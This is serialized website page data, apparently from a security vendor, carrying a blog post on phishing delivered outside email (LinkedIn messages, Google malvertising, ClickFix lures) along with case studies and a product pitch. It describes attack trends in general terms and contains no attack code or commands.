sys":31741},{"id":30498,"type":976,"linkType":977},[],{"data":31744,"content":31745,"nodeType":905},{},[],{"data":31747,"content":31748,"nodeType":909},{},[31749],{"data":31750,"marks":31751,"value":30510,"nodeType":883},{},[31752],{"type":916},{"data":31754,"content":31755,"nodeType":879},{},[31756],{"data":31757,"marks":31758,"value":30517,"nodeType":883},{},[],{"data":31760,"content":31761,"nodeType":879},{},[31762,31765,31772],{"data":31763,"marks":31764,"value":30524,"nodeType":883},{},[],{"data":31766,"content":31767,"nodeType":940},{"uri":30527},[31768],{"data":31769,"marks":31770,"value":30533,"nodeType":883},{},[31771],{"type":948},{"data":31773,"marks":31774,"value":30537,"nodeType":883},{},[],{"data":31776,"content":31777,"nodeType":879},{},[31778],{"data":31779,"marks":31780,"value":30544,"nodeType":883},{},[],{"data":31782,"content":31783,"nodeType":879},{},[31784,31787,31794],{"data":31785,"marks":31786,"value":30551,"nodeType":883},{},[],{"data":31788,"content":31789,"nodeType":940},{"uri":30554},[31790],{"data":31791,"marks":31792,"value":30560,"nodeType":883},{},[31793],{"type":948},{"data":31795,"marks":31796,"value":30564,"nodeType":883},{},[],{"data":31798,"content":31799,"nodeType":879},{},[31800],{"data":31801,"marks":31802,"value":30571,"nodeType":883},{},[],{"data":31804,"content":31807,"nodeType":971},{"target":31805},{"sys":31806},{"id":30576,"type":976,"linkType":977},[],{"data":31809,"content":31810,"nodeType":905},{},[],{"data":31812,"content":31813,"nodeType":909},{},[31814],{"data":31815,"marks":31816,"value":30588,"nodeType":883},{},[31817],{"type":916},{"data":31819,"content":31820,"nodeType":879},{},[31821],{"data":31822,"marks":31823,"value":30595,"nodeType":883},{},[],{"data":31825,"content":31826,"nodeType":1531},{},[31827,31836,31845],{"data":31828,"content":31829,"nodeType":1535},{},[31830],{"data":31831,"content":31832,"nodeType":879},{},[31833],{"data":31834,"marks":31835,"value":30608,"nodeType":883},{},[],{"data":31837,"content":31838,"nodeType":1535},{},[31839],{"data":31840,"content":31841,"nodeType":879},{},[31842],{"data":31843,"marks":31844,"value":30618,"nodeType":883},{},[],{"data":31846,"content":31847,"nodeType":1535},{},[31848],{"data":31849,"content":31850,"nodeType":879},{},[31851],{"data":31852,"marks":31853,"value":30628,"nodeType":883},{},[],{"data":31855,"content":31856,"nodeType":879},{},[31857],{"data":31858,"marks":31859,"value":30635,"nodeType":883},{},[],{"data":31861,"content":31862,"nodeType":879},{},[31863],{"data":31864,"marks":31865,"value":30642,"nodeType":883},{},[],{"data":31867,"content":31868,"nodeType":1531},{},[31869,31888,31897],{"data":31870,"content":31871,"nodeType":1535},{},[31872],{"data":31873,"content":31874,"nodeType":879},{},[31875,31878,31885],{"data":31876,"marks":31877,"value":30655,"nodeType":883},{},[],{"data":31879,"content":31880,"nodeType":940},{"uri":30658},[31881],{"data":31882,"marks":31883,"value":30664,"nodeType":883},{},[31884],{"type":948},{"data":31886,"marks":31887,"value":30668,"nodeType":883},{},[],{"data":31889,"content":31890,"nodeType":1535},{},[31891],{"data":31892,"content":31893,"nodeType":879},{},[31894],{"data":31895,"marks":31896,"value":30678,"nodeType":883},{},[],{"data":31898,"content":31899,"nodeType":1535},{},[31900],{"data":31901,"content":31902,"nodeType":879},{},[31903],{"data":31904,"marks":31905,"value":30688,"nodeType":883},{},[],{"data":31907,"content":31908,"nodeType":879},{},[31909,31912,31918],{"data":31910,"marks":31911,"value":30695,"nodeType":883},{},[],{"data":31913,"content":31914,"nodeType":940},{"uri":30698},[31915],{"data":31916,"marks":31917,"value":30703,"nodeType":883},{},[],{"data":31919,"marks":31920,"value":30707,"nodeType":883},{},[],{"data":31922,"content":31923,"nodeType":4197},{},[31924],{"data":31925,"content":31926,"nodeType":879},{},[31927],{"data":31928,"marks":31929,"value":30717,"nodeType":883},{},[],{"data":31931,"content":31932,"nodeType":879},{},[31933],{"data":31934,"marks":31935,"value":30724,"nodeType":883},{},[],{"data":31937,"content":31938,"nodeType":905},{},[],{"data":31940,"content":31941,"nodeType":909},{},[31942],{"data":31943,"marks":31944,"value":30735,"nodeType":883},{},[31945],{"type":916},{"data":31947,"content":31948,"nodeType":879},{},[31949,31952,31959],{"data":31950,"marks":31951,"value":30742,"nodeType":883},{},[],{"data":31953,"content":31954,"nodeType":940},{"uri":30745},[31955],{"data":31956,"marks":31957,"value":30751,"nodeType":883},{},[31958],{"type":948},{"data":31960,"marks":31961,"value":30755,"nodeType":883},{},[],{"data":31963,"content":31964,"nodeType":879},{},[31965],{"data":31966,"marks":31967,"value":30762,"nodeType":883},{},[],{"data":31969,"content":31970,"nodeType":879},{},[31971],{"data":31972,"marks":31973,"value":30769,"nodeType":883},{},[],{"data":31975,"content":31978,"nodeType":971},{"target":31976},{"sys":31977},{"id":30774,"type":976,"linkType":977},[],{"data":31980,"content":31981,"nodeType":905},{},[],{"data":31983,"content":31984,"nodeType":909},{},[31985],{"data":31986,"marks":31987,"value":18990,"nodeType":883},{},[31988],{"type":916},{"data":31990,"content":31991,"nodeType":879},{},[31992,31995,32002],{"data":31993,"marks":31994,"value":30792,"nodeType":883},{},[],{"data":31996,"content":31997,"nodeType":940},{"uri":30795},[31998],{"data":31999,"marks":32000,"value":30801,"nodeType":883},{},[32001],{"type":948},{"data":32003,"marks":32004,"value":30805,"nodeType":883},{},[],{"data":32006,"content":32007,"nodeType":879},{},[32008,32011,32018,32021,32028],{"data":32009,"marks":32010,"value":16267,"nodeType":883},{},[],{"data":32012,"content":32013,"nodeType":940},{"uri":10222},[32014],{"data":32015,"marks":32016,"value":10228,"nodeType":883},{},[32017],{"type":948},{"data":32019,"marks":32020,"value":26256,"nodeType":883},{},[],{"data":32022,"content":32023,"nodeType":940},{"uri":4772},[32024],{"data":32025,"marks":32026,"value":1751,"nodeType":883},{},[32027],{"type":948},{"data":32029,"marks":32030,"value":1350,"nodeType":883},{},[],{"data":32032,"content":32035,"nodeType":971},{"target":32033},{"sys":32034},{"id":30391,"type":976,"linkType":977},[],{"data":32037,"content":32038,"nodeType":879},{},[32039],{"data":32040,"marks":32041,"value":21,"nodeType":883},{},[],{"entries":32043},{"hyperlink":32044,"inline":32045,"block":32046},[],[],[32047,32051,32057,32061,32084,32091,32105,32112],{"sys":32048,"__typename":6000,"title":30843,"arcadeDemoUrl":32049,"playText":32050},{"id":30301},"https:\u002F\u002Fdemo.arcade.software\u002FyQIHbuD990Dk5CjI1cvS?embed","1 mins",{"sys":32052,"__typename":1765,"title":32053,"caption":32053,"layoutMode":59,"file":32054},{"id":30332},"The most advanced ClickFix page we’ve seen — complete with an embedded video showing the victim how to complete the check.",{"url":32055,"width":1781,"height":32056},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FImveC0bIdp4QxXqHyQKz9\u002F526f7ae589f71d0c23c7c738b8d0bc90\u002Fimage3.png",1117,{"sys":32058,"__typename":13297,"type":13298,"ctaText":32059,"buttonLabel":32060,"buttonColour":13301,"buttonUrl":30795},{"id":30391},"Check out our latest webinar for a deep dive into the evolution of ClickFix-style attacks, with real-world examples from investigations.","Watch On-demand",{"sys":32062,"__typename":1785,"content":32063,"name":32083,"title":59},{"id":30441},{"json":32064},{"data":32065,"content":32066,"nodeType":875},{},[32067],{"data":32068,"content":32069,"nodeType":879},{},[32070,32074,32079],{"data":32071,"marks":32072,"value":32073,"nodeType":883},{},[],"Of the ClickFix pages intercepted by Push where the delivery vector was observed, ",{"data":32075,"marks":32076,"value":32078,"nodeType":883},{},[32077],{"type":916},"4 in 5 were accessed via Google Search.",{"data":32080,"marks":32081,"value":32082,"nodeType":883},{},[]," While other examples may have been stopped by controls such as email before the page could be loaded by the user, this shows a significant monitoring gap when it comes to non-email delivery vectors.","ClickFix blog insight box 2",{"sys":32085,"__typename":1765,"title":32086,"caption":32086,"layoutMode":59,"file":32087},{"id":30466},"Like other modern phishing attacks, ClickFix lures are distributed all over the internet — not just email.",{"url":32088,"width":32089,"height":32090},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4l0xLRs8Z1w3aXMbzzyFPL\u002F9cb4721c53379da31a4019371072a7ef\u002Fimage1.png",1696,986,{"sys":32092,"__typename":1785,"content":32093,"name":32104,"title":59},{"id":30498},{"json":32094},{"data":32095,"content":32096,"nodeType":875},{},[32097],{"data":32098,"content":32099,"nodeType":879},{},[32100],{"data":32101,"marks":32102,"value":32103,"nodeType":883},{},[],"Although there are ways to block web pages from performing copy to clipboard via device settings or group policy, the practical reality of ClickFix means that these methods are not effective. Because ClickFix is a user gesture initiated paste event (some form of user interaction such as a button press is required on the page before loading the ClickFix lure) it cannot be blocked from the host.","ClickFix insight box 1",{"sys":32106,"__typename":1765,"title":32107,"caption":32107,"layoutMode":59,"file":32108},{"id":30576},"The current hybrid attack path sees the attacker deliver lures in the browser, to compromise the endpoint, to get access to creds and cookies stored in the browser. What if you could skip the endpoint altogether? ",{"url":32109,"width":32110,"height":32111},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7kIZUmQkiHKKX0kjZQYfia\u002Fa7957baa43f54fe407779e845240e27e\u002Fimage2.png",1970,816,{"sys":32113,"__typename":6000,"title":32114,"arcadeDemoUrl":32115,"playText":26812},{"id":30774},"ClickFix Feature Release","https:\u002F\u002Fdemo.arcade.software\u002FqhzGMAx2q3b6IRlHqBsB?embed",{"items":32117},[],{},"Analyzing sophisticated ClickFix lures seen in the wild",{"items":32121},[32122,32698,33245],{"__typename":1967,"sys":32123,"content":32125,"title":32684,"synopsis":32685,"hashTags":59,"publishedDate":32686,"slug":32687,"tagsCollection":32688,"authorsCollection":32694},{"id":32124},"4wtqKNN8D4tvbICAQ17L1Z",{"json":32126},{"data":32127,"content":32128,"nodeType":875},{},[32129,32137,32144,32151,32158,32164,32167,32175,32182,32189,32205,32249,32255,32262,32278,32285,32291,32294,32302,32309,32325,32345,32365,32385,32392,32395,32403,32421,32453,32459,32465,32468,32476,32495,32515,32522,32542,32548,32554,32557,32565,32572,32579,32612,32619,32622,32630,32637,32644,32651,32658],{"data":32130,"content":32131,"nodeType":909},{},[32132],{"data":32133,"marks":32134,"value":32136,"nodeType":883},{},[32135],{"type":916},"Phishing has moved outside of the mailbox",{"data":32138,"content":32139,"nodeType":879},{},[32140],{"data":32141,"marks":32142,"value":32143,"nodeType":883},{},[],"Because of the changes to working practices, employees are more accessible than ever to external attackers. Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. ",{"data":32145,"content":32146,"nodeType":879},{},[32147],{"data":32148,"marks":32149,"value":32150,"nodeType":883},{},[],"But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content.",{"data":32152,"content":32153,"nodeType":879},{},[32154],{"data":32155,"marks":32156,"value":32157,"nodeType":883},{},[],"Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration.",{"data":32159,"content":32163,"nodeType":971},{"target":32160},{"sys":32161},{"id":32162,"type":976,"linkType":977},"1tDciIJqKnNoR4FqZChjTy",[],{"data":32165,"content":32166,"nodeType":905},{},[],{"data":32168,"content":32169,"nodeType":909},{},[32170],{"data":32171,"marks":32172,"value":32174,"nodeType":883},{},[32173],{"type":916},"Why am I not hearing about this more? ",{"data":32176,"content":32177,"nodeType":879},{},[32178],{"data":32179,"marks":32180,"value":32181,"nodeType":883},{},[],"Phishing attacks outside of email usually go unreported. This is to be expected when most of the industry’s data on phishing attacks comes from email security vendors and tools. ",{"data":32183,"content":32184,"nodeType":879},{},[32185],{"data":32186,"marks":32187,"value":32188,"nodeType":883},{},[],"If phishing bypasses the email layer, most organizations are left relying on user reported attacks. Some organizations might supplement this with a web proxy, but these are being increasingly defeated by modern phishing kits, which use an array of obfuscation and detection evasion techniques to bypass these detections. ",{"data":32190,"content":32191,"nodeType":879},{},[32192,32196,32201],{"data":32193,"marks":32194,"value":32195,"nodeType":883},{},[],"The most valuable information for security teams today is the webpage that is loaded ",{"data":32197,"marks":32198,"value":32200,"nodeType":883},{},[32199],{"type":891},"through",{"data":32202,"marks":32203,"value":32204,"nodeType":883},{},[]," the network traffic: What does the HTML body look like? What is the user likely seeing on the page? To do this, you need to stitch together and reconstruct what the browser is doing by looking at the network data. Except for very simple websites, this happens through JavaScript on the client side. ",{"data":32206,"content":32207,"nodeType":879},{},[32208,32212,32221,32224,32233,32236,32245],{"data":32209,"marks":32210,"value":32211,"nodeType":883},{},[],"This is hard enough when analysing a typical SaaS app. But the latest generation of fully customized Attacker-in-the-Middle (AitM) phishing kits are going out of their way to make this as challenging as possible, using techniques like ",{"data":32213,"content":32215,"nodeType":940},{"uri":32214},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fdom-obfuscation\u002F",[32216],{"data":32217,"marks":32218,"value":32220,"nodeType":883},{},[32219],{"type":948},"DOM obfuscation",{"data":32222,"marks":32223,"value":2524,"nodeType":883},{},[],{"data":32225,"content":32227,"nodeType":940},{"uri":32226},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fpage-obfuscation\u002F",[32228],{"data":32229,"marks":32230,"value":32232,"nodeType":883},{},[32231],{"type":948},"Page obfuscation",{"data":32234,"marks":32235,"value":6198,"nodeType":883},{},[],{"data":32237,"content":32239,"nodeType":940},{"uri":32238},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fcode-obfuscation\u002F",[32240],{"data":32241,"marks":32242,"value":32244,"nodeType":883},{},[32243],{"type":948},"Code obfuscation",{"data":32246,"marks":32247,"value":32248,"nodeType":883},{},[]," so all you see at a network layer is a garbled, obfuscated mess of JS code.",{"data":32250,"content":32254,"nodeType":971},{"target":32251},{"sys":32252},{"id":32253,"type":976,"linkType":977},"71QsaPju68i5QiJcgQlHDs",[],{"data":32256,"content":32257,"nodeType":879},{},[32258],{"data":32259,"marks":32260,"value":32261,"nodeType":883},{},[],"So, non-email phishing is going broadly undetected through technical controls. And even when spotted and reported by a user — what can you really do about it?",{"data":32263,"content":32264,"nodeType":879},{},[32265,32269,32274],{"data":32266,"marks":32267,"value":32268,"nodeType":883},{},[],"Take a social media phish. You can’t see which other accounts were targeted or hit in your user base. Unlike email, there’s no way to recall or quarantine the same message hitting multiple users. There’s no rule you can modify, or senders you can block. You can report the account, and ",{"data":32270,"marks":32271,"value":32273,"nodeType":883},{},[32272],{"type":891},"maybe",{"data":32275,"marks":32276,"value":32277,"nodeType":883},{},[]," something will happen when the site owner gets around to it — but the attacker has probably got what they needed by then and moved on. ",{"data":32279,"content":32280,"nodeType":879},{},[32281],{"data":32282,"marks":32283,"value":32284,"nodeType":883},{},[],"Most organizations simply block the URLs involved. But this doesn’t really help when attackers are rapidly rotating their phishing domains — by the time you block one site, another three have already taken its place. ",{"data":32286,"content":32290,"nodeType":971},{"target":32287},{"sys":32288},{"id":32289,"type":976,"linkType":977},"1II2kHyOZcShLsexx1TAgy",[],{"data":32292,"content":32293,"nodeType":905},{},[],{"data":32295,"content":32296,"nodeType":909},{},[32297],{"data":32298,"marks":32299,"value":32301,"nodeType":883},{},[32300],{"type":916},"But aren’t these just personal accounts?",{"data":32303,"content":32304,"nodeType":879},{},[32305],{"data":32306,"marks":32307,"value":32308,"nodeType":883},{},[],"Modern phishing attacks blur the boundary between corporate and personal. The fact is that your employees are routinely accessing personal messaging and social media apps on their corporate devices. Users are signed into apps like LinkedIn, X, WhatsApp, Signal, even message boards like Reddit on their work laptop and\u002For mobile devices. And with malicious links being found on search engines (aka. malvertising), they can even stumble upon them while browsing the web normally.",{"data":32310,"content":32311,"nodeType":879},{},[32312,32316,32321],{"data":32313,"marks":32314,"value":32315,"nodeType":883},{},[],"In short: anywhere that your users can be contacted by someone outside of your organization presents an opportunity for phishing. In fact, in most of these cases people ",{"data":32317,"marks":32318,"value":32320,"nodeType":883},{},[32319],{"type":916},"expect ",{"data":32322,"marks":32323,"value":32324,"nodeType":883},{},[],"to be contacted by people they don’t know. ",{"data":32326,"content":32327,"nodeType":879},{},[32328,32332,32341],{"data":32329,"marks":32330,"value":32331,"nodeType":883},{},[],"It’s also a myth that campaigns can’t be targeted in the same way on these platforms, that they’re somehow more random and therefore less dangerous. For example, social media accounts are some of the easiest for attackers to create en masse — or take over. According to the most recent ",{"data":32333,"content":32335,"nodeType":940},{"uri":32334},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002FT149\u002Freports\u002F2025-dbir-data-breach-investigations-report.pdf",[32336],{"data":32337,"marks":32338,"value":32340,"nodeType":883},{},[32339],{"type":948},"Verizon DBIR",{"data":32342,"marks":32343,"value":32344,"nodeType":883},{},[],", 60%+ of creds found in infostealer logs were from social media sites. They’re also likely to use single-factor logins. If an attacker can take over one account, and use it to credibly communicate with one of your employees, they have a way higher likelihood of being successful than with your average unsolicited email. ",{"data":32346,"content":32347,"nodeType":879},{},[32348,32352,32361],{"data":32349,"marks":32350,"value":32351,"nodeType":883},{},[],"Malicious ads can also be targeted. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Phishing sites also often come with ",{"data":32353,"content":32355,"nodeType":940},{"uri":32354},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fconditional-loading\u002F",[32356],{"data":32357,"marks":32358,"value":32360,"nodeType":883},{},[32359],{"type":948},"conditional loading",{"data":32362,"marks":32363,"value":32364,"nodeType":883},{},[]," parameters to only deliver the malicious payload under specific conditions — for example, only if the visitor came from a particular email campaign link, or only if they are in a certain organization, using a certain browser, from a specific IP range, etc. ",{"data":32366,"content":32367,"nodeType":879},{},[32368,32372,32381],{"data":32369,"marks":32370,"value":32371,"nodeType":883},{},[],"And even if the attacker only manages to reach your employee on their personal device, this can still be laundered into a corporate account compromise. Just look at the ",{"data":32373,"content":32375,"nodeType":940},{"uri":32374},"https:\u002F\u002Fsec.okta.com\u002Farticles\u002F2023\u002F11\u002Funauthorized-access-oktas-support-case-management-system-root-cause",[32376],{"data":32377,"marks":32378,"value":32380,"nodeType":883},{},[32379],{"type":948},"2023 Okta breach",{"data":32382,"marks":32383,"value":32384,"nodeType":883},{},[],", where an attacker exploited the fact that an Okta employee had signed into a personal Google profile on their work device. This meant any credentials saved in their browser were synced to their personal device — including a customer support system service account providing access to 134 customer tenants. When their personal device got hacked, so too did all of their work credentials.",{"data":32386,"content":32387,"nodeType":879},{},[32388],{"data":32389,"marks":32390,"value":32391,"nodeType":883},{},[],"So, there’s plenty of scope for non-email phishing to result in targeted phishing campaigns. If anything, it’s arguably less work for the attacker to spin up these non-email campaigns than it is to do the necessary legwork to create and build up email sender reputation!",{"data":32393,"content":32394,"nodeType":905},{},[],{"data":32396,"content":32397,"nodeType":909},{},[32398],{"data":32399,"marks":32400,"value":32402,"nodeType":883},{},[32401],{"type":916},"Case study: LinkedIn spear-phishing",{"data":32404,"content":32405,"nodeType":879},{},[32406,32409,32417],{"data":32407,"marks":32408,"value":21,"nodeType":883},{},[],{"data":32410,"content":32411,"nodeType":940},{"uri":25591},[32412],{"data":32413,"marks":32414,"value":32416,"nodeType":883},{},[32415],{"type":948},"Attackers recently ran a LinkedIn spear-phishing campaign targeting tech company execs.",{"data":32418,"marks":32419,"value":32420,"nodeType":883},{},[]," The victims were targeted via LinkedIn direct message from another exec about a fake investment opportunity. The sender’s account had been compromised and used to approach high-value targets. ",{"data":32422,"content":32423,"nodeType":879},{},[32424,32428,32437,32441,32449],{"data":32425,"marks":32426,"value":32427,"nodeType":883},{},[],"The attack led the victim through a chain of custom pages hosted on ",{"data":32429,"content":32431,"nodeType":940},{"uri":32430},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Ftrusted-website-hosting\u002F",[32432],{"data":32433,"marks":32434,"value":32436,"nodeType":883},{},[32435],{"type":948},"legitimate sites",{"data":32438,"marks":32439,"value":32440,"nodeType":883},{},[]," (a well-known ",{"data":32442,"content":32444,"nodeType":940},{"uri":32443},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fphishing-evolution?",[32445],{"data":32446,"marks":32447,"value":8587,"nodeType":883},{},[32448],{"type":948},{"data":32450,"marks":32451,"value":32452,"nodeType":883},{},[],") such as Google Sites, Google Search, and Microsoft Dynamics, before serving up an Attacker-in-the-Middle phishing page impersonating Google Workspace, before serving up a session-stealing AitM phishing page. ",{"data":32454,"content":32458,"nodeType":971},{"target":32455},{"sys":32456},{"id":32457,"type":976,"linkType":977},"1cEvEzLdKIuj6zuGn9aWJB",[],{"data":32460,"content":32464,"nodeType":971},{"target":32461},{"sys":32462},{"id":32463,"type":976,"linkType":977},"6LfBXkDKqh1ogCMxaxyV6x",[],{"data":32466,"content":32467,"nodeType":905},{},[],{"data":32469,"content":32470,"nodeType":909},{},[32471],{"data":32472,"marks":32473,"value":32475,"nodeType":883},{},[32474],{"type":916},"Case study: Google Search malvertising",{"data":32477,"content":32478,"nodeType":879},{},[32479,32482,32491],{"data":32480,"marks":32481,"value":21,"nodeType":883},{},[],{"data":32483,"content":32485,"nodeType":940},{"uri":32484},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finvestigating-a-recent-malvertising-campaign-targeting-onfido-customers\u002F",[32486],{"data":32487,"marks":32488,"value":32490,"nodeType":883},{},[32489],{"type":948},"A company was hit with a targeted Google ad",{"data":32492,"marks":32493,"value":32494,"nodeType":883},{},[]," which was designed to look highly convincing, and positioned above the legitimate ad. This took advantage of the fact that many users will search for login pages rather than accessing the site via bookmark. ",{"data":32496,"content":32497,"nodeType":879},{},[32498,32502,32511],{"data":32499,"marks":32500,"value":32501,"nodeType":883},{},[],"In this case, the attacker had made use of a ",{"data":32503,"content":32505,"nodeType":940},{"uri":32504},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Frentable-subdomains\u002F",[32506],{"data":32507,"marks":32508,"value":32510,"nodeType":883},{},[32509],{"type":948},"rentable subdomain",{"data":32512,"marks":32513,"value":32514,"nodeType":883},{},[]," (us[.]com) to make the link appear highly legitimate, with only small changes to the real URL that were easy to miss. ",{"data":32516,"content":32517,"nodeType":879},{},[32518],{"data":32519,"marks":32520,"value":32521,"nodeType":883},{},[],"Instead of the real login, the link took the victim to a session-stealing AITM page.  ",{"data":32523,"content":32524,"nodeType":879},{},[32525,32529,32538],{"data":32526,"marks":32527,"value":32528,"nodeType":883},{},[],"This was later traced back to a ",{"data":32530,"content":32532,"nodeType":940},{"uri":32531},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-spider-ttp-evolution-in-2025\u002F",[32533],{"data":32534,"marks":32535,"value":32537,"nodeType":883},{},[32536],{"type":948},"Scattered Spider",{"data":32539,"marks":32540,"value":32541,"nodeType":883},{},[]," campaign.",{"data":32543,"content":32547,"nodeType":971},{"target":32544},{"sys":32545},{"id":32546,"type":976,"linkType":977},"5o1LEkZfeYVjMZmROi3Yh",[],{"data":32549,"content":32553,"nodeType":971},{"target":32550},{"sys":32551},{"id":32552,"type":976,"linkType":977},"4RAXFNPdvUXjMDUE7tc10a",[],{"data":32555,"content":32556,"nodeType":905},{},[],{"data":32558,"content":32559,"nodeType":909},{},[32560],{"data":32561,"marks":32562,"value":32564,"nodeType":883},{},[32563],{"type":916},"What can an attacker do with a compromised account? ",{"data":32566,"content":32567,"nodeType":879},{},[32568],{"data":32569,"marks":32570,"value":32571,"nodeType":883},{},[],"It’s important to think about the bigger picture when it comes to a modern phishing compromise. ",{"data":32573,"content":32574,"nodeType":879},{},[32575],{"data":32576,"marks":32577,"value":32578,"nodeType":883},{},[],"Most phishing attacks focus on core enterprise cloud platforms such as Microsoft and Google, or specialist Identity Providers like Okta. Taking over one of these accounts doesn’t just give access to the core apps and data within the respective app, but also enables the attacker to leverage SSO to sign into any connected app that the employee logs into with their account. ",{"data":32580,"content":32581,"nodeType":879},{},[32582,32586,32595,32599,32608],{"data":32583,"marks":32584,"value":32585,"nodeType":883},{},[],"This gives an attacker access to just about every core business function and dataset in your organization. And from this point, it’s much easier to target other users of these internal apps — using internal messenger apps like ",{"data":32587,"content":32589,"nodeType":940},{"uri":32588},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fphishing-slack-persistence\u002F",[32590],{"data":32591,"marks":32592,"value":32594,"nodeType":883},{},[32593],{"type":948},"Slack or Teams",{"data":32596,"marks":32597,"value":32598,"nodeType":883},{},[],", or techniques like ",{"data":32600,"content":32602,"nodeType":940},{"uri":32601},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fsamljacking\u002Fdescription.md",[32603],{"data":32604,"marks":32605,"value":32607,"nodeType":883},{},[32606],{"type":948},"SAMLjacking",{"data":32609,"marks":32610,"value":32611,"nodeType":883},{},[]," to turn an app into a watering hole for other users trying to log in. ",{"data":32613,"content":32614,"nodeType":879},{},[32615],{"data":32616,"marks":32617,"value":32618,"nodeType":883},{},[],"A single account compromise can quickly snowball into a multi-million dollar, business-wide breach.",{"data":32620,"content":32621,"nodeType":905},{},[],{"data":32623,"content":32624,"nodeType":909},{},[32625],{"data":32626,"marks":32627,"value":32629,"nodeType":883},{},[32628],{"type":916},"What can organizations do about non-email phishing? ",{"data":32631,"content":32632,"nodeType":879},{},[32633],{"data":32634,"marks":32635,"value":32636,"nodeType":883},{},[],"It’s clear that the traditional anti-phishing toolset hasn’t kept up with phishing innovation. ",{"data":32638,"content":32639,"nodeType":879},{},[32640],{"data":32641,"marks":32642,"value":32643,"nodeType":883},{},[],"To tackle modern phishing attacks, organizations need a solution that detects and blocks phishing across all apps and delivery vectors. ",{"data":32645,"content":32646,"nodeType":879},{},[32647],{"data":32648,"marks":32649,"value":32650,"nodeType":883},{},[],"Push Security doesn’t detect the redirect tricks, or rely on outdated domain TI feeds. It doesn’t matter what delivery channel or camouflage methods are used, Push detects and blocks attacks by identifying the attack in real time, as the user loads and interacts with the page in their web browser.",{"data":32652,"content":32653,"nodeType":879},{},[32654],{"data":32655,"marks":32656,"value":32657,"nodeType":883},{},[],"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. ",{"data":32659,"content":32660,"nodeType":879},{},[32661,32664,32671,32674,32681],{"data":32662,"marks":32663,"value":16267,"nodeType":883},{},[],{"data":32665,"content":32666,"nodeType":940},{"uri":10222},[32667],{"data":32668,"marks":32669,"value":10228,"nodeType":883},{},[32670],{"type":948},{"data":32672,"marks":32673,"value":26256,"nodeType":883},{},[],{"data":32675,"content":32676,"nodeType":940},{"uri":4772},[32677],{"data":32678,"marks":32679,"value":1751,"nodeType":883},{},[32680],{"type":948},{"data":32682,"marks":32683,"value":1350,"nodeType":883},{},[],"Why attackers are moving beyond email-based phishing","Why phishing attacks are moving away from exclusively email-based delivery, and what this means for security teams. \n","2025-09-18T00:00:00.000Z","why-attackers-are-moving-beyond-email-based-phishing",{"items":32689},[32690,32692],{"sys":32691,"name":3273},{"id":3272},{"sys":32693,"name":343},{"id":3276},{"items":32695},[32696],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":32697},{"url":872},{"__typename":1967,"sys":32699,"content":32700,"title":27540,"synopsis":31479,"hashTags":59,"publishedDate":31480,"slug":27541,"tagsCollection":33235,"authorsCollection":33241},{"id":27246},{"json":32701},{"data":32702,"content":32703,"nodeType":875},{},[32704,32740,32786,32799,32804,32810,32813,32820,32826,32832,32838,32854,32860,32865,32880,32885,32888,32895,32901,32908,32924,32930,32936,32942,32949,32955,32961,32966,32972,33002,33007,33014,33030,33036,33057,33063,33069,33074,33080,33083,33090,33103,33119,33125,33131,33137,33142,33149,33164,33167,33174,33180,33186,33192,33198,33224,33229],{"data":32705,"content":32706,"nodeType":879},{},[32707,32710,32717,32720,32727,32730,32737],{"data":32708,"marks":32709,"value":30869,"nodeType":883},{},[],{"data":32711,"content":32712,"nodeType":940},{"uri":30872},[32713],{"data":32714,"marks":32715,"value":316,"nodeType":883},{},[32716],{"type":948},{"data":32718,"marks":32719,"value":30881,"nodeType":883},{},[],{"data":32721,"content":32722,"nodeType":940},{"uri":30884},[32723],{"data":32724,"marks":32725,"value":30890,"nodeType":883},{},[32726],{"type":948},{"data":32728,"marks":32729,"value":30894,"nodeType":883},{},[],{"data":32731,"content":32732,"nodeType":940},{"uri":30897},[32733],{"data":32734,"marks":32735,"value":30903,"nodeType":883},{},[32736],{"type":948},{"data":32738,"marks":32739,"value":30907,"nodeType":883},{},[],{"data":32741,"content":32742,"nodeType":879},{},[32743,32746,32753,32756,32763,32766,32773,32776,32783],{"data":32744,"marks":32745,"value":30914,"nodeType":883},{},[],{"data":32747,"content":32748,"nodeType":940},{"uri":30917},[32749],{"data":32750,"marks":32751,"value":30923,"nodeType":883},{},[32752],{"type":948},{"data":32754,"marks":32755,"value":2524,"nodeType":883},{},[],{"data":32757,"content":32758,"nodeType":940},{"uri":30929},[32759],{"data":32760,"marks":32761,"value":30935,"nodeType":883},{},[32762],{"type":948},{"data":32764,"marks":32765,"value":2524,"nodeType":883},{},[],{"data":32767,"content":32768,"nodeType":940},{"uri":30941},[32769],{"data":32770,"marks":32771,"value":30947,"nodeType":883},{},[32772],{"type":948},{"data":32774,"marks":32775,"value":30951,"nodeType":883},{},[],{"data":32777,"content":32778,"nodeType":940},{"uri":30954},[32779],{"data":32780,"marks":32781,"value":30960,"node